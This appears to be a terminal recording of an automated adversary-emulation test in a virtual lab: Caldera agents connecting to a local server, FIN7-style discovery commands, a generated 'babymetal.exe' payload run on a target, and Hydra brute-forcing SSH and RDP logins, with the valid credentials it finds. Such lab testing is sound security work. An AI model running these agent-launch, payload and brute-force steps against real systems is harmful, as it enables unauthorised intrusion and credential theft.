lxml~=4.5.2 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 18)) (4.5.2)\r\nRequirement already satisfied: reportlab==3.5.49 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 19)) (3.5.49)\r\nRequirement already satisfied: svglib==1.0.1 in /home/vagrant/.local/lib/python3.8/site-packages (from -r requirements.txt (line 20)) (1.0.1)\r\nRequirement already satisfied: MarkupSafe>=0.23 in /usr/lib/python3/dist-pac"] +[47.114305, "o", "kages (from jinja2==2.10.3->-r requirements.txt (line 5)) (1.1.1)\r\nRequirement already 
satisfied: cffi!=1.11.3,>=1.8 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.14.3)\r\nRequirement already satisfied: six>=1.4.1 in /usr/lib/python3/dist-packages (from cryptography==2.8->-r requirements.txt (line 7)) (1.15.0)\r\nRequirement already satisfied: babel>=1.3 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.8.0)\r\nRequirement already satisfied: imagesize in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.2.0)\r\nRequirement already satisfied: requests>=2.5.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.24.0)\r\nRequirement already satisfied: packaging in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (20.4)\r\nRequirement already satisfied: sphinxcontrib-htmlhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx=="] +[47.114341, "o", "3.0.4->-r requirements.txt (line 9)) (2.0.0)\r\nRequirement already satisfied: Pygments>=2.0 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.3.1)\r\nRequirement already satisfied: sphinxcontrib-qthelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.3)\r\nRequirement already satisfied: snowballstemmer>=1.1 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (2.1.0)\r\nRequirement already satisfied: alabaster<0.8,>=0.7 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.7.8)\r\nRequirement already satisfied: setuptools in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (50.3.0)\r\nRequirement already satisfied: sphinxcontrib-applehelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\nRequirement already satisfied: sphinxcontrib-jsmath in 
/home/vagrant/.local/lib/"] +[47.114379, "o", "python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.1)\r\nRequirement already satisfied: sphinxcontrib-devhelp in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.0.2)\r\nRequirement already satisfied: sphinxcontrib-serializinghtml in /home/vagrant/.local/lib/python3.8/site-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (1.1.5)\r\nRequirement already satisfied: docutils>=0.12 in /usr/lib/python3/dist-packages (from Sphinx==3.0.4->-r requirements.txt (line 9)) (0.16)\r\nRequirement already satisfied: commonmark>=0.8.1 in /home/vagrant/.local/lib/python3.8/site-packages (from recommonmark==0.6.0->-r requirements.txt (line 11)) (0.9.1)\r\nRequirement already satisfied: pathspec>=0.5.9 in /home/vagrant/.local/lib/python3.8/site-packages (from dirhash==0.1.1->-r requirements.txt (line 13)) (0.8.1)\r\nRequirement already satisfied: websocket-client>=0.32.0 in /usr/lib/python3/dist-packages (from docker==4.2.0->-r requirements.txt (li"] +[47.114445, "o", "ne 14)) (0.57.0)\r\nRequirement already satisfied: pyasn1>=0.4.6 in /usr/lib/python3/dist-packages (from ldap3==2.8.1->-r requirements.txt (line 17)) (0.4.8)\r\nRequirement already satisfied: pillow>=4.0.0 in /usr/lib/python3/dist-packages (from reportlab==3.5.49->-r requirements.txt (line 19)) (8.0.1)\r\nRequirement already satisfied: cssselect2>=0.2.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (0.4.1)\r\nRequirement already satisfied: tinycss2>=0.6.0 in /home/vagrant/.local/lib/python3.8/site-packages (from svglib==1.0.1->-r requirements.txt (line 20)) (1.1.0)\r\nRequirement already satisfied: webencodings in /usr/lib/python3/dist-packages (from cssselect2>=0.2.0->svglib==1.0.1->-r requirements.txt (line 20)) (0.5.1)\r\n\r\n=== stderr ===\r\nzsh:cd:1: no such file or directory: None\r\nfatal: destination path 'caldera' 
already exists and is not an empty directory.\r\n\r\nDebug: Stderr: zsh:cd:1: no such file or directory: None\r\nfatal: destination path 'caldera' already"] +[47.114492, "o", " exists and is not an empty directory.\r\n\u001b[94mStarting Caldera server \u001b[0m\r\n"] +[47.29882, "o", "None\r\n"] +[57.386237, "o", "\u001b[92mCaldera server started. Confirmed it is running. \u001b[0m\r\n"] +[57.39097, "o", "\u001b[94mpreparing target target2 ....\u001b[0m\r\n"] +[57.394121, "o", "\u001b[94mInstalling machinery: vagrant\u001b[0m\r\n"] +[57.394259, "o", "\u001b[92mInstalled machinery: vagrant\u001b[0m\r\n"] +[58.061945, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"] +[58.062104, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"] +[365.815169, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"] +[366.127765, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"] +[366.43231, "o", " 1 file(s) copied.\r\r\n"] +[366.448343, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"] +[366.528428, "o", "\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 3 STOP_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x1\r\r\n WAIT_HINT : 0x2bf20\r\r\n"] +[366.549334, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 3 STOP_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, ACCEPTS_PRESHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x1\r\r\n WAIT_HINT : 0x2bf20\r\n\r\n(no stderr)\r\n"] +[371.585517, "o", " 1 file(s) copied.\r\r\n"] +[371.608795, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"] +[371.666169, "o", " 1 file(s) copied.\r\r\n"] +[371.681221, "o", "Command exited with status 
0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"] +[371.746656, "o", " 1 file(s) copied.\r\r\n"] +[371.760721, "o", "Command exited with status 0.\r\n=== stdout ===\r\n 1 file(s) copied.\r\n\r\n(no stderr)\r\n"] +[371.830233, "o", "The operation completed successfully.\r\r\r\n"] +[371.847954, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe operation completed successfully.\r\n\r\n(no stderr)\r\n"] +[371.922877, "o", "The operation completed successfully.\r\r\r\n"] +[371.942729, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nThe operation completed successfully.\r\n\r\nDebug: Stderr: The operation completed successfully.\r\n"] +[372.015059, "o", "The operation completed successfully.\r\r\r\n"] +[372.03526, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nThe operation completed successfully.\r\n\r\nDebug: Stderr: The operation completed successfully.\r\n"] +[374.191468, "o", "\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 2 START_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x0\r\r\n WAIT_HINT : 0x7d0\r\r\n PID : 984\r\r\n FLAGS : \r\r\n"] +[374.612598, "o", "Command exited with status 0.\r\n=== stdout ===\r\n\r\r\nSERVICE_NAME: aswbidsagent \r\r\n TYPE : 10 WIN32_OWN_PROCESS \r\r\n STATE : 2 START_PENDING \r\r\n (NOT_STOPPABLE, NOT_PAUSABLE, IGNORES_SHUTDOWN)\r\r\n WIN32_EXIT_CODE : 0 (0x0)\r\r\n SERVICE_EXIT_CODE : 0 (0x0)\r\r\n CHECKPOINT : 0x0\r\r\n WAIT_HINT : 0x7d0\r\r\n PID : 984\r\r\n FLAGS :\r\n\r\n(no stderr)\r\n"] +[376.733509, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[441.799386, "o", "\u001b[92mTarget is up: target2 \u001b[0m\r\n\u001b[94mpreparing target target3 ....\u001b[0m\r\n"] +[441.802436, "o", "\u001b[94mInstalling machinery: vagrant\u001b[0m\r\n"] +[441.802622, "o", "\u001b[92mInstalled machinery: 
vagrant\u001b[0m\r\n"] +[445.219168, "o", "\u001b[94mInstalling Caldera service \u001b[0m\r\n"] +[445.219374, "o", "\u001b[92mInstalled Caldera service \u001b[0m\r\n"] +[612.735313, "o", "\u001b[92mTarget is up: target3 \u001b[0m\r\n"] +[613.105912, "o", "The account already exists.\r\r\n\r\r\n"] +[613.106507, "o", "More help is available by typing NET HELPMSG 2224.\r\r\n"] +[613.106678, "o", "\r\r\n"] +[613.377246, "o", "The account already exists.\r\r\n\r\r\n"] +[613.377462, "o", "More help is available by typing NET HELPMSG 2224.\r\r\n"] +[613.377569, "o", "\r\r\n"] +[613.651823, "o", "The account already exists.\r\r\n\r\r\nMore help is available by typing NET HELPMSG 2224.\r\r\n"] +[613.651996, "o", "\r\r\n"] +[613.919243, "o", "The account already exists.\r\r\n"] +[613.919426, "o", "\r\r\nMore help is available by typing NET HELPMSG 2224.\r\r\n"] +[613.91954, "o", "\r\r\n"] +[614.175234, "o", "System error 1378 has occurred.\r\r\n"] +[614.175403, "o", "\r\r\nThe specified account name is already a member of the group.\r\r\n"] +[614.17558, "o", "\r\r\n"] +[614.426216, "o", "System error 1378 has occurred.\r\r\n"] +[614.426371, "o", "\r\r\n"] +[614.426466, "o", "The specified account name is already a member of the group.\r\r\n"] +[614.426641, "o", "\r\r\n"] +[614.687573, "o", "System error 1378 has occurred.\r\r\n\r\r\nThe specified account name is already a member of the group.\r\r\n"] +[614.687686, "o", "\r\r\n"] +[614.952564, "o", "System error 1378 has occurred.\r\r\n"] +[614.952665, "o", "\r\r\n"] +[614.952793, "o", "The specified account name is already a member of the group.\r\r\n"] +[614.95295, "o", "\r\r\n"] +[615.211853, "o", "The operation completed successfully.\r\r\r\n"] +[615.230597, "o", "Command exited with status 0.\r\n=== stdout ===\r\nThe operation completed successfully.\r\n\r\n(no stderr)\r\n"] +[615.69261, "o", "\r\r\nUpdated 3 rule(s).\r\r\nOk.\r\r\n"] +[615.692721, "o", "\r\r\n"] +[615.731812, "o", "Command exited with status 0.\r\n=== 
stdout ===\r\n\r\r\nUpdated 3 rule(s).\r\r\nOk.\r\n\r\n(no stderr)\r\n"] +[615.768572, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[615.871724, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[615.894056, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[615.94657, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[616.252327, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"] +[616.522501, "o", "A subdirectory or file C:\\capture already exists.\r\r\n"] +[616.77925, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[616.88319, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[616.968447, "o", "[SC] StartService FAILED 1056:\r\r\n\r\r\nAn instance of the service is already running.\r\r\n\r\r\n"] +[617.223748, "o", "[SC] StartService FAILED 1056:\r\r\n\r\r\nAn instance of the service is already running.\r\r\n\r\r\n"] +[619.574809, "o", "Executing (Win32_Process)->Create()\r\r\r\n"] +[619.605721, "o", "Method execution successful.\r\r\r\nOut Parameters:\r\r\ninstance of __PARAMETERS\r\r\n{\r\r\n\tProcessId = 4092;\r\r\n\tReturnValue = 0;\r\r\n};\r\r\n"] +[619.605843, "o", "\r\r\n"] +[619.657522, "o", "Command exited with status 0.\r\n=== stdout ===\r\nExecuting (Win32_Process)->Create()\r\r\r\nMethod execution successful.\r\r\r\nOut Parameters:\r\r\ninstance of __PARAMETERS\r\r\n{\r\r\n\tProcessId = 4092;\r\r\n\tReturnValue = 0;\r\r\n};\r\n\r\n=== stderr ===\r\n\r\n\r\nDebug: Stderr: \r\n"] +[624.900179, "o", "cp: './idpx' and '/home/vagrant/idpx' are the same file\r\n"] +[625.360739, "o", "cp: './idpx' and '/home/vagrant/idpx' are the same file\r\n"] +[625.666636, "o", "None\r\n\u001b[94mStarting Caldera client target2 \u001b[0m\r\n"] +[626.241241, "o", "wmic process call create \"%userprofile%\\splunkd.go -server http://192.168.178.132:8888 -group red_windows -paw target2w\" \r\n"] +[626.255297, "o", 
"None\r\n\u001b[92mCaldera client started \u001b[0m\r\n"] +[626.255338, "o", "\u001b[92mInitial start of caldera client: target3 \u001b[0m\r\n\u001b[94mStarting Caldera client target3 \u001b[0m\r\n"] +[626.264956, "o", "cd /home/vagrant; chmod +x caldera_agent.sh; nohup bash ./caldera_agent.sh\r\n"] +[626.266353, "o", "None\r\n\u001b[92mCaldera client started \u001b[0m\r\n"] +[626.266412, "o", "\u001b[92mInitial start of caldera client: target3 \u001b[0m\r\n"] +[646.285467, "o", "\u001b[94mContacting caldera agents on all targets ....\u001b[0m\r\n"] +[646.293778, "o", "\u001b[92mCaldera agents reached\u001b[0m\r\n\u001b[94mRunning Caldera attacks\u001b[0m\r\n"] +[646.754051, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221271.460396', 'rules': [], 'relationships': [], 'facts': []}\r\n"] +[646.758928, "o", "Got:\r\n"] +[646.760695, "o", "[]\r\n"] +[646.954014, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: bd527b63-9f9e-46e0-9816-b8434d2b8989 \u001b[0m\r\n\u001b[104m Current User: Obtain user from current session \u001b[0m\r\n"] +[687.011907, "o", "'target2w\\\\attackx\\r'\r\n"] +[687.313306, "o", "\u001b[94mRestarting caldera server and waiting for clients to re-connect\u001b[0m\r\n\u001b[94mStarting Caldera server \u001b[0m\r\n"] +[687.345847, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[687.370986, "o", "None\r\n"] +[697.460587, "o", "\u001b[92mCaldera server started. Confirmed it is running. 
\u001b[0m\r\n"] +[731.612754, "o", "\u001b[92mRestarted caldera server clients re-connected\u001b[0m\r\n"] +[732.055067, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221356.779327', 'rules': [], 'relationships': [], 'facts': []}\r\n"] +[732.06055, "o", "Got:\r\n"] +[732.062419, "o", "[]\r\n"] +[732.256434, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target3 Group: red_linux Ability: bd527b63-9f9e-46e0-9816-b8434d2b8989 \u001b[0m\r\n\u001b[104m Current User: Obtain user from current session \u001b[0m\r\n"] +[792.342252, "o", "'vagrant'\r\n"] +[792.654227, "o", "\u001b[94mRestarting caldera server and waiting for clients to re-connect\u001b[0m\r\n\u001b[94mStarting Caldera server \u001b[0m\r\n"] +[792.686988, "o", "Command exited with status 0.\r\n(no stdout)\r\n(no stderr)\r\n"] +[792.688926, "o", "None\r\n"] +[802.77716, "o", "\u001b[92mCaldera server started. Confirmed it is running. \u001b[0m\r\n"] +[828.884346, "o", "\u001b[92mRestarted caldera server clients re-connected\u001b[0m\r\n\u001b[92mFinished Caldera attacks\u001b[0m\r\n\u001b[94mRunning Kali attacks\u001b[0m\r\nAttacking machine with PAW: target2w with attack: fin7_1\r\n"] +[828.887288, "o", "\u001b[94mStep 1: Initial Breach\u001b[0m\r\n\u001b[92mEnd Step 1: Initial Breach\u001b[0m\r\n\u001b[94mStep 2: Delayed Malware Execution\u001b[0m\r\n\u001b[92mEnd Step 2: Delayed Malware Execution\u001b[0m\r\n"] +[828.887345, "o", "\u001b[94mStep 3: Target Assessment\u001b[0m\r\n\u001b[96mnew view \u001b[0m\r\n"] +[829.351867, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221454.053941', 'rules': [], 'relationships': [], 'facts': [{'trait': 'remote.host.fqdn', 'value': '192.168.178.189'}]}\r\n"] +[829.358865, "o", "Got:\r\n"] +[829.360445, "o", "[]\r\n"] +[829.55338, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: deeac480-5c2a-42b5-90bb-41675ee53c7e \u001b[0m\r\n\u001b[104m View remote shares: 
View the shares of a remote host \u001b[0m\r\n"] +[869.610888, "o", "('Shared resources at \\\\\\\\192.168.178.189\\r'\r\n '\\r'\r\n '\\r'\r\n '\\r'\r\n 'Share name Type Used as Comment \\r'\r\n '\\r'\r\n '-------------------------------------------------------------------------------\\r'\r\n 'ADMIN$ Disk Remote Admin \\r'\r\n 'C$ Disk Default share \\r'\r\n 'IPC$ IPC Remote IPC \\r'\r\n 'The command completed successfully.\\r'\r\n '\\r')\r\n"] +[869.913776, "o", "\u001b[96mget-wmiobject win32_computersystem | fl model\u001b[0m\r\n"] +[870.362918, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221495.0803838', 'rules': [], 'relationships': [], 'facts': []}\r\n"] +[870.368332, "o", "Got:\r\n"] +[870.370061, "o", "[]\r\n"] +[870.54879, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: 5dc841fd-28ad-40e2-b10e-fb007fe09e81 \u001b[0m\r\n\u001b[104m Virtual or Real: Determine if the system is virtualized or physical \u001b[0m\r\n"] +[910.610526, "o", "'\\r\\rmodel : VirtualBox\\r\\r\\r\\r'\r\n"] +[910.911601, "o", "\u001b[96mquery USERNAME env\u001b[0m\r\n"] +[911.366975, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221536.0781682', 'rules': [], 'relationships': [], 'facts': []}\r\n"] +[911.374615, "o", "Got:\r\n"] +[911.376091, "o", "[]\r\n"] +[911.568012, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: c0da588f-79f0-4263-8998-7496b1a40596 \u001b[0m\r\n\u001b[104m Identify active user: Find user running agent \u001b[0m\r\n"] +[961.634485, "o", "'AttackX\\r'\r\n"] +[961.922261, "o", "\u001b[96mNetwork configuration discovery. 
Original is some WMI, here we are using nbstat\u001b[0m\r\n"] +[962.354441, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221587.0888445', 'rules': [], 'relationships': [], 'facts': []}\r\n"] +[962.361309, "o", "Got:\r\n"] +[962.363184, "o", "[]\r\n"] +[962.565536, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: 14a21534-350f-4d83-9dd7-3c56b93a0c17 \u001b[0m\r\n\u001b[104m Find Domain: Find Domain information \u001b[0m\r\n"] +[1022.651477, "o", "(' \\r'\r\n 'Ethernet:\\r'\r\n 'Node IpAddress: [10.0.2.15] Scope Id: []\\r'\r\n '\\r'\r\n ' NetBIOS Local Name Table\\r'\r\n '\\r'\r\n ' Name Type Status\\r'\r\n ' ---------------------------------------------\\r'\r\n ' TARGET2W <00> UNIQUE Registered \\r'\r\n ' WORKGROUP <00> GROUP Registered \\r'\r\n ' TARGET2W <20> UNIQUE Registered \\r'\r\n ' \\r'\r\n 'Ethernet 2:\\r'\r\n 'Node IpAddress: [192.168.178.189] Scope Id: []\\r'\r\n '\\r'\r\n ' NetBIOS Local Name Table\\r'\r\n '\\r'\r\n ' Name Type Status\\r'\r\n "] +[1022.651596, "o", "' ---------------------------------------------\\r'\r\n ' TARGET2W <00> UNIQUE Registered \\r'\r\n ' WORKGROUP <00> GROUP Registered \\r'\r\n ' TARGET2W <20> UNIQUE Registered \\r')\r\n"] +[1022.975533, "o", "\u001b[96mSystem info discovery, as close as it gets\u001b[0m\r\n"] +[1023.474736, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221648.1421063', 'rules': [], 'relationships': [], 'facts': []}\r\n"] +[1023.480623, "o", "Got:\r\n"] +[1023.482996, "o", "[]\r\n"] +[1023.687796, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: b6b105b9-41dc-490b-bc5c-80d699b82ce8 \u001b[0m\r\n\u001b[104m Find OS Version: Find OS Version \u001b[0m\r\n"] +[1053.731621, "o", "('\\r'\r\n 'Major Minor Build Revision\\r'\r\n '----- ----- ----- --------\\r'\r\n '10 0 19042 0 \\r'\r\n '\\r'\r\n '\\r')\r\n"] +[1054.052628, "o", "\u001b[96mTake screenshot\u001b[0m\r\n"] 
+[1054.464586, "o", "{'index': 'sources', 'name': 'source_testoperation__1623221679.219213', 'rules': [], 'relationships': [], 'facts': []}\r\n"] +[1054.469042, "o", "Got:\r\n"] +[1054.470495, "o", "[]\r\n"] +[1054.651863, "o", "\u001b[94mExecuted attack operation\u001b[0m\r\n\u001b[104m PAW: target2w Group: red_windows Ability: 316251ed-6a28-4013-812b-ddf5b5b007f8 \u001b[0m\r\n\u001b[104m Screen Capture: capture the contents of the screen \u001b[0m\r\n"] +[1124.744184, "o", "('Exception calling \"CopyFromScreen\" with \"3\" argument(s): \"The handle is '\r\n 'invalid\"\\r'\r\n 'At line:1 char:252\\r'\r\n '+ ... ge($bmp); $graphics.CopyFromScreen($bounds.Location, [Drawing.Point '\r\n '...\\r'\r\n '+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\\r'\r\n ' + CategoryInfo : NotSpecified: (:) [], '\r\n 'MethodInvocationException\\r'\r\n ' + FullyQualifiedErrorId : Win32Exception\\r'\r\n ' \\r')\r\n"] +[1125.047509, "o", "\u001b[92mEnd Step 3: Target Assessment\u001b[0m\r\n\u001b[94mStep 4: Staging Interactive Toolkit\u001b[0m\r\n\u001b[96mCreate babymetal replacement\u001b[0m\r\n"] +[1129.833274, "o", "No encoder specified, outputting raw payload\r\nPayload size: 1032344 bytes\r\nFinal size of elf file: 1032344 bytes\r\n"] +[1129.835002, "o", "Saved as: babymetal.exe\r\n"] +[1129.880806, "o", "Command exited with status 0.\r\n(no stdout)\r\n=== stderr ===\r\nNo encoder specified, outputting raw payload\r\nPayload size: 1032344 bytes\r\nFinal size of elf file: 1032344 bytes\r\nSaved as: babymetal.exe\r\n\r\nDebug: Stderr: No encoder specified, outputting raw payload\r\nPayload size: 1032344 bytes\r\nFinal size of elf file: 1032344 bytes\r\nSaved as: babymetal.exe\r\n"] +[1129.943892, "o", "\u001b[96mGenerated babymetal.exe...deploying it\u001b[0m\r\n"] +[1129.994568, "o", "None\r\n"] +[1129.994607, "o", "\u001b[96mExecuted payload babymetal.exe on target2 \u001b[0m\r\n\u001b[92mEnd Step 4: Staging Interactive Toolkit\u001b[0m\r\n\u001b[94mStep 5: Escalate 
Privileges\u001b[0m\r\n\u001b[92mEnd Step 5: Escalate Privileges\u001b[0m"] +[1129.994741, "o", "\r\n\u001b[94mStep 6: Expand Access\u001b[0m\r\n\u001b[92mEnd Step 6: Expand Access\u001b[0m\r\n\u001b[94mStep 7: Setup User Monitoring\u001b[0m\r\n\u001b[92mEnd Step 7: Setup User Monitoring\u001b[0m\r\n\u001b[94mStep 8: User Monitoring\u001b[0m\r\n\u001b[92mEnd Step 8: User Monitoring\u001b[0m\r\n\u001b[94mStep 9: Setup Shim Persistence\u001b[0m\r\n\u001b[92mEnd Step 9: Setup Shim Persistence\u001b[0m\r\n\u001b[94mStep 10: Steal Payment Data\u001b[0m\r\n\u001b[92mEnd Step 10: Steal Payment Data\u001b[0m\r\n"] +[1134.999777, "o", "Attacking machine with PAW: target3 with attack: hydra\r\n"] +[1135.011154, "o", "zsh:cd:1: no such file or directory: None\r\n"] +[1135.020669, "o", "\r\nWARNING: apt does not have a stable CLI interface. Use with caution in scripts.\r\n\r\n"] +[1135.025903, "o", "Reading package lists..."] +[1135.05476, "o", "\r\n"] +[1135.056144, "o", "Building dependency tree..."] +[1135.180674, "o", "\r\nReading state information..."] +[1135.183021, "o", "\r\n"] +[1135.34485, "o", "hydra is already the newest version (9.1-1).\r\n0 upgraded, 0 newly installed, 0 to remove and 1389 not upgraded.\r\n"] +[1135.399219, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\n"] +[1135.39932, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:55:59\r\n"] +[1135.399495, "o", "[DATA] max 16 tasks per 1 server, overall 16 tasks, 40 login tries (l:5/p:8), ~3 tries per task\r\n[DATA] attacking ssh://192.168.178.145:22/\r\n"] +[1135.399547, "o", "[WARNING] Many SSH configurations limit the number of parallel tasks, it is recommended to reduce the tasks: use -t 4\r\n"] +[1135.898263, "o", "[22][ssh] host: 192.168.178.145 login: test password: test\r\n"] +[1138.064322, "o", 
"[22][ssh] host: 192.168.178.145 login: password password: passw0rd\r\n"] +[1143.558955, "o", "[ERROR] 1 target did not resolve or could not be connected\r\n[ERROR] 0 target did not complete\r\n"] +[1143.559084, "o", "1 of 1 target successfully completed, 2 valid passwords found\r\n[WARNING] Writing restore file because 1 final worker threads did not complete until end.\r\nHydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-06-09 02:56:07\r\n"] +[1143.58797, "o", "Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).\r\n\r\n"] +[1143.588112, "o", "Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-06-09 02:56:07\r\n[WARNING] the rdp module is experimental. Please test, report - and if possible, fix.\r\n"] +[1143.588226, "o", "[WARNING] rdp servers often don't like many connections, use -t 1 or -t 4 to reduce the number of parallel connections and -W 1 or -W 3 to wait between connection to allow the server to recover\r\n[INFO] Reduced number of tasks to 4 (rdp does not like many parallel connections)\r\n"] +[1143.588418, "o", "[DATA] max 4 tasks per 1 server, overall 4 tasks, 40 login tries (l:5/p:8), ~10 tries per task\r\n[DATA] attacking rdp://192.168.178.145:3389/\r\n"] +[1144.144217, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwertz, continuing attacking the account.\r\n"] +[1144.148391, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwert, continuing attacking the account.\r\n"] +[1144.148795, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: password, continuing attacking the account.\r\n"] +[1144.149246, "o", "[3389][rdp] account on 
192.168.178.145 might be valid but account not active for remote desktop: login: test password: 12345, continuing attacking the account.\r\n"] +[1144.157408, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: qwerty, continuing attacking the account.\r\n"] +[1144.159518, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: swordfish, continuing attacking the account.\r\n"] +[1144.160769, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: passw0rd, continuing attacking the account.\r\n"] +[1144.161189, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: test password: test, continuing attacking the account.\r\n"] +[1144.169608, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: 12345, continuing attacking the account.\r\n"] +[1144.169715, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwert, continuing attacking the account.\r\n"] +[1144.170303, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwerty, continuing attacking the account.\r\n"] +[1144.170512, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: qwertz, continuing attacking the account.\r\n"] +[1144.178448, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: swordfish, continuing attacking the account.\r\n"] +[1144.179424, "o", "[3389][rdp] account on 192.168.178.145 might be valid but account not active for remote desktop: login: root password: test, continuing 
